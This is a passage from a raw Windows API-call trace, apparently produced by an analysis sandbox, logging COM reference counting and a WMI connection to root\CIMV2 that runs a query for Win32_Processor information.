ppvObject=0x41e734*=0x672f5a0) returned 0x0 [0108.851] WbemDefPath:IUnknown:Release (This=0x6720a90) returned 0x0 [0108.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x672f5a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e354 | out: ppvObject=0x41e354*=0x672f5a0) returned 0x0 [0108.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x672f5a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e310 | out: ppvObject=0x41e310*=0x0) returned 0x80004002 [0108.851] WbemDefPath:IUnknown:AddRef (This=0x672f5a0) returned 0x3 [0108.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x672f5a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dc6c | out: ppvObject=0x41dc6c*=0x0) returned 0x80004002 [0108.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x672f5a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dc1c | out: ppvObject=0x41dc1c*=0x0) returned 0x80004002 [0108.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x672f5a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dc28 | out: ppvObject=0x41dc28*=0x765158) returned 0x0 [0108.851] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x765158, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dc30 | out: pCid=0x41dc30*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.851] WbemDefPath:IUnknown:Release (This=0x765158) returned 0x3 [0108.851] CoGetContextToken (in: pToken=0x41dc88 | out: pToken=0x41dc88) returned 0x0 [0108.851] CoGetContextToken (in: pToken=0x41e090 | out: pToken=0x41e090) returned 0x0 [0108.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x672f5a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e120 | out: ppvObject=0x41e120*=0x0) returned 0x80004002 [0108.851] WbemDefPath:IUnknown:Release (This=0x672f5a0) returned 0x2 [0108.851] WbemDefPath:IUnknown:Release (This=0x672f5a0) returned 0x1 [0108.851] CoGetContextToken (in: pToken=0x41ea18 | out: pToken=0x41ea18) returned 0x0 [0108.852] CoGetContextToken (in: pToken=0x41e978 | out: pToken=0x41e978) returned 0x0 [0108.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x672f5a0, riid=0x41ea48*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41ea44 | out: ppvObject=0x41ea44*=0x672f5a0) returned 0x0 [0108.852] WbemDefPath:IUnknown:AddRef (This=0x672f5a0) returned 0x3 [0108.852] WbemDefPath:IUnknown:Release (This=0x672f5a0) returned 0x2 [0108.852] WbemDefPath:IWbemPath:SetText (This=0x672f5a0, uMode=0x4, pszPath="root\\CIMV2") returned 0x0 [0108.852] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x672f5a0, puCount=0x41ebc4 | out: puCount=0x41ebc4*=0x2) returned 0x0 [0108.852] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=4, puBuffLength=0x41ebc0*=0x0, pszText=0x0 | out: puBuffLength=0x41ebc0*=0xf, pszText=0x0) returned 0x0 [0108.852] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=4, puBuffLength=0x41ebc0*=0xf, pszText="00000000000000" | out: puBuffLength=0x41ebc0*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0108.852] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x672f5a0, puCount=0x41ebb0 | out: puCount=0x41ebb0*=0x2) returned 0x0 [0108.852] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=4, puBuffLength=0x41ebac*=0x0, pszText=0x0 | out: puBuffLength=0x41ebac*=0xf, pszText=0x0) returned 0x0 [0108.852] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=4, puBuffLength=0x41ebac*=0xf, pszText="00000000000000" | out: puBuffLength=0x41ebac*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0108.852] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41eb44 | out: ppv=0x41eb44*=0x72015c) returned 0x0 [0108.852] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41eb3c | out: pAptType=0x41eb3c*=1) returned 0x0 [0108.852] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41eb40 | out: ppvObject=0x41eb40*=0x0) returned 0x80004002 [0108.852] IUnknown:Release (This=0x72015c) returned 0x1 [0108.853] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e760 | out: ppv=0x41e760*=0x672f1c0) returned 0x0 [0108.853] WbemLocator:IUnknown:QueryInterface (in: This=0x672f1c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e978 | out: ppvObject=0x41e978*=0x0) returned 0x80004002 [0108.853] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f1c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e98c | out: ppvObject=0x41e98c*=0x6720d70) returned 0x0 [0108.853] WbemLocator:IUnknown:Release (This=0x672f1c0) returned 0x0 [0108.853] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e5ac | out: ppvObject=0x41e5ac*=0x6720d70) returned 0x0 [0108.853] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d70, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e568 | out: ppvObject=0x41e568*=0x0) returned 0x80004002 [0108.854] WbemLocator:IUnknown:AddRef (This=0x6720d70) returned 0x3 [0108.854] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dec4 | out: ppvObject=0x41dec4*=0x0) returned 0x80004002 [0108.854] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41de74 | out: ppvObject=0x41de74*=0x0) returned 0x80004002 [0108.854] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41de80 | out: ppvObject=0x41de80*=0x0) returned 0x80004002 [0108.854] CoGetContextToken (in: pToken=0x41dee0 | out: pToken=0x41dee0) returned 0x0 [0108.854] CoGetContextToken (in: pToken=0x41e2e8 | out: pToken=0x41e2e8) returned 0x0 [0108.854] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e378 | out: ppvObject=0x41e378*=0x0) returned 0x80004002 [0108.854] WbemLocator:IUnknown:Release (This=0x6720d70) returned 0x2 [0108.854] WbemLocator:IUnknown:Release (This=0x6720d70) returned 0x1 [0108.854] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0108.854] CoGetContextToken (in: pToken=0x41e8b8 | out: pToken=0x41e8b8) returned 0x0 [0108.854] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d70, riid=0x41e988*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e984 | out: ppvObject=0x41e984*=0x6720d70) returned 0x0 [0108.854] WbemLocator:IUnknown:AddRef (This=0x6720d70) returned 0x3 [0108.854] WbemLocator:IUnknown:Release (This=0x6720d70) returned 0x2 [0108.854] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x672f5a0, puCount=0x41eb20 | out: puCount=0x41eb20*=0x2) returned 0x0 [0108.854] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=8, puBuffLength=0x41eb1c*=0x0, pszText=0x0 | out: puBuffLength=0x41eb1c*=0xf, pszText=0x0) returned 0x0 [0108.854] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=8, puBuffLength=0x41eb1c*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eb1c*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0108.854] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x41e9f8 | out: ppv=0x41e9f8*=0x6720d80) returned 0x0 [0108.854] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6720d80, strNetworkResource="\\\\.\\root\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x41ea8c | out: ppNamespace=0x41ea8c*=0x672f8bc) returned 0x0 [0108.885] WbemLocator:IUnknown:QueryInterface (in: This=0x672f8bc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e928 | out: ppvObject=0x41e928*=0x77215c) returned 0x0 [0108.885] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x77215c, pProxy=0x672f8bc, pAuthnSvc=0x41e978, pAuthzSvc=0x41e974, pServerPrincName=0x41e96c, pAuthnLevel=0x41e970, pImpLevel=0x41e960, pAuthInfo=0x41e964, pCapabilites=0x41e968 | out: pAuthnSvc=0x41e978*=0xa, pAuthzSvc=0x41e974*=0x0, pServerPrincName=0x41e96c, pAuthnLevel=0x41e970*=0x6, pImpLevel=0x41e960*=0x2, pAuthInfo=0x41e964, pCapabilites=0x41e968*=0x1) returned 0x0 [0108.885] WbemLocator:IUnknown:Release (This=0x77215c) returned 0x1 [0108.885] WbemLocator:IUnknown:QueryInterface (in: This=0x672f8bc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e91c | out: ppvObject=0x41e91c*=0x77217c) returned 0x0 [0108.885] WbemLocator:IUnknown:QueryInterface (in: This=0x672f8bc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e918 | out: ppvObject=0x41e918*=0x77215c) returned 0x0 [0108.885] WbemLocator:IClientSecurity:SetBlanket (This=0x77215c, pProxy=0x672f8bc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0108.886] WbemLocator:IUnknown:Release (This=0x77215c) returned 0x2 [0108.886] WbemLocator:IUnknown:Release (This=0x77217c) returned 0x1 [0108.886] CoTaskMemFree (pv=0x758b38) [0108.886] WbemLocator:IUnknown:Release (This=0x6720d80) returned 0x0 [0108.886] WbemLocator:IUnknown:QueryInterface (in: This=0x672f8bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e518 | out: ppvObject=0x41e518*=0x77217c) returned 0x0 [0108.886] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e4d4 | out: ppvObject=0x41e4d4*=0x0) returned 0x80004002 [0108.886] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e2f4 | out: ppvObject=0x41e2f4*=0x0) returned 0x80004002 [0108.887] WbemLocator:IUnknown:AddRef (This=0x77217c) returned 0x3 [0108.887] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41de34 | out: ppvObject=0x41de34*=0x0) returned 0x80004002 [0108.887] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dde4 | out: ppvObject=0x41dde4*=0x0) returned 0x80004002 [0108.887] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41ddf0 | out: ppvObject=0x41ddf0*=0x7720dc) returned 0x0 [0108.888] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7720dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41ddf8 | out: pCid=0x41ddf8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.888] WbemLocator:IUnknown:Release (This=0x7720dc) returned 0x3 [0108.888] CoGetContextToken (in: pToken=0x41de50 | out: pToken=0x41de50) returned 0x0 [0108.888] CoGetContextToken (in: pToken=0x41e258 | out: pToken=0x41e258) returned 0x0 [0108.888] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e8 | out: ppvObject=0x41e2e8*=0x772164) returned 0x0 [0108.888] WbemLocator:IRpcOptions:Query (in: This=0x772164, pPrx=0x77217c, dwProperty=2, pdwValue=0x41e310 | out: pdwValue=0x41e310) returned 0x80004002 [0108.888] WbemLocator:IUnknown:Release (This=0x772164) returned 0x3 [0108.888] WbemLocator:IUnknown:Release (This=0x77217c) returned 0x2 [0108.888] CoGetContextToken (in: pToken=0x41e828 | out: pToken=0x41e828) returned 0x0 [0108.888] CoGetContextToken (in: pToken=0x41e788 | out: pToken=0x41e788) returned 0x0 [0108.888] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x41e858*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x41e854 | out: ppvObject=0x41e854*=0x672f8bc) returned 0x0 [0108.888] WbemLocator:IUnknown:AddRef (This=0x672f8bc) returned 0x4 [0108.888] WbemLocator:IUnknown:Release (This=0x672f8bc) returned 0x3 [0108.888] WbemLocator:IUnknown:Release (This=0x672f8bc) returned 0x2 [0108.888] SysStringLen (param_1=0x0) returned 0x0 [0108.889] CoGetContextToken (in: pToken=0x41e820 | out: pToken=0x41e820) returned 0x0 [0108.889] WbemLocator:IUnknown:AddRef (This=0x77217c) returned 0x3 [0108.889] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e6b4 | out: ppvObject=0x41e6b4*=0x77217c) returned 0x0 [0108.889] WbemLocator:IUnknown:Release (This=0x77217c) returned 0x3 [0108.889] WbemLocator:IUnknown:Release (This=0x77217c) returned 0x2 [0108.889] CoGetContextToken (in: pToken=0x41e918 | out: pToken=0x41e918) returned 0x0 [0108.889] WbemLocator:IUnknown:AddRef (This=0x672f8bc) returned 0x3 [0108.889] IWbemServices:ExecQuery (in: This=0x672f8bc, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Processor", lFlags=16, pCtx=0x0, ppEnum=0x41eb28 | out: ppEnum=0x41eb28*=0x672fbdc) returned 0x0 [0108.905] IUnknown:QueryInterface (in: This=0x672fbdc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e98c | out: ppvObject=0x41e98c*=0x672fbe0) returned 0x0 [0108.905] IClientSecurity:QueryBlanket (in: This=0x672fbe0, pProxy=0x672fbdc, pAuthnSvc=0x41e9dc, pAuthzSvc=0x41e9d8, pServerPrincName=0x41e9d0, pAuthnLevel=0x41e9d4, pImpLevel=0x41e9c4, pAuthInfo=0x41e9c8, pCapabilites=0x41e9cc | out: pAuthnSvc=0x41e9dc*=0xa, pAuthzSvc=0x41e9d8*=0x0, pServerPrincName=0x41e9d0, pAuthnLevel=0x41e9d4*=0x6, pImpLevel=0x41e9c4*=0x2, pAuthInfo=0x41e9c8, pCapabilites=0x41e9cc*=0x1) returned 0x0 [0108.905] IUnknown:Release (This=0x672fbe0) returned 0x1 [0108.905] IUnknown:QueryInterface (in: This=0x672fbdc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e980 | out: ppvObject=0x41e980*=0x7768e4) returned 0x0 [0108.905] IUnknown:QueryInterface (in: This=0x672fbdc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e97c | out: ppvObject=0x41e97c*=0x672fbe0) returned 0x0 [0108.905] IClientSecurity:SetBlanket (This=0x672fbe0, pProxy=0x672fbdc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0108.907] IUnknown:Release (This=0x672fbe0) returned 0x2 [0108.907] WbemLocator:IUnknown:Release (This=0x7768e4) returned 0x1 [0108.907] CoTaskMemFree (pv=0x758aa8) [0108.907] IUnknown:QueryInterface (in: This=0x672fbdc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e578 | out: ppvObject=0x41e578*=0x7768e4) returned 0x0 [0108.907] WbemLocator:IUnknown:QueryInterface (in: This=0x7768e4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e534 | out: ppvObject=0x41e534*=0x0) returned 0x80004002 [0108.908] WbemLocator:IUnknown:QueryInterface (in: This=0x7768e4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e354 | out: ppvObject=0x41e354*=0x0) returned 0x80004002 [0108.908] WbemLocator:IUnknown:AddRef (This=0x7768e4) returned 0x3 [0108.908] WbemLocator:IUnknown:QueryInterface (in: This=0x7768e4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41de94 | out: ppvObject=0x41de94*=0x0) returned 0x80004002 [0108.908] WbemLocator:IUnknown:QueryInterface (in: This=0x7768e4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41de44 | out: ppvObject=0x41de44*=0x0) returned 0x80004002 [0108.909] WbemLocator:IUnknown:QueryInterface (in: This=0x7768e4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41de50 | out: ppvObject=0x41de50*=0x776844) returned 0x0 [0108.909] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x776844, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41de58 | out: pCid=0x41de58*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.909] WbemLocator:IUnknown:Release (This=0x776844) returned 0x3 [0108.909] CoGetContextToken (in: pToken=0x41deb0 | out: pToken=0x41deb0) returned 0x0 [0108.909] CoGetContextToken (in: pToken=0x41e2b8 | out: pToken=0x41e2b8) returned 0x0 [0108.909] WbemLocator:IUnknown:QueryInterface (in: This=0x7768e4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e348 | out: ppvObject=0x41e348*=0x7768cc) returned 0x0 [0108.909] WbemLocator:IRpcOptions:Query (in: This=0x7768cc, pPrx=0x7768e4, dwProperty=2, pdwValue=0x41e370 | out: pdwValue=0x41e370) returned 0x80004002 [0108.909] WbemLocator:IUnknown:Release (This=0x7768cc) returned 0x3 [0108.909] WbemLocator:IUnknown:Release (This=0x7768e4) returned 0x2 [0108.909] CoGetContextToken (in: pToken=0x41e888 | out: pToken=0x41e888) returned 0x0 [0108.909] CoGetContextToken (in: pToken=0x41e7e8 | out: pToken=0x41e7e8) returned 0x0 [0108.909] WbemLocator:IUnknown:QueryInterface (in: This=0x7768e4, riid=0x41e8b8*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x41e8b4 | out: ppvObject=0x41e8b4*=0x672fbdc) returned 0x0 [0108.909] IUnknown:AddRef (This=0x672fbdc) returned 0x4 [0108.909] IUnknown:Release (This=0x672fbdc) returned 0x3 [0108.909] IUnknown:Release (This=0x672fbdc) returned 0x2 [0108.909] WbemLocator:IUnknown:Release (This=0x672f8bc) returned 0x2 [0108.909] SysStringLen (param_1=0x0) returned 0x0 [0108.910] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x672f5a0, puCount=0x41eb74 | out: puCount=0x41eb74*=0x2) returned 0x0 [0108.910] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=4, puBuffLength=0x41eb70*=0x0, pszText=0x0 | out: puBuffLength=0x41eb70*=0xf, pszText=0x0) returned 0x0 [0108.910] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=4, puBuffLength=0x41eb70*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eb70*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0108.910] CoGetContextToken (in: pToken=0x41e9c0 | out: pToken=0x41e9c0) returned 0x0 [0108.910] IUnknown:AddRef (This=0x672fbdc) returned 0x3 [0108.910] IEnumWbemClassObject:Clone (in: This=0x672fbdc, ppEnum=0x41eb80 | out: ppEnum=0x41eb80*=0x6730cfc) returned 0x0 [0108.911] IUnknown:QueryInterface (in: This=0x6730cfc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41ea44 | out: ppvObject=0x41ea44*=0x6730d00) returned 0x0 [0108.911] IClientSecurity:QueryBlanket (in: 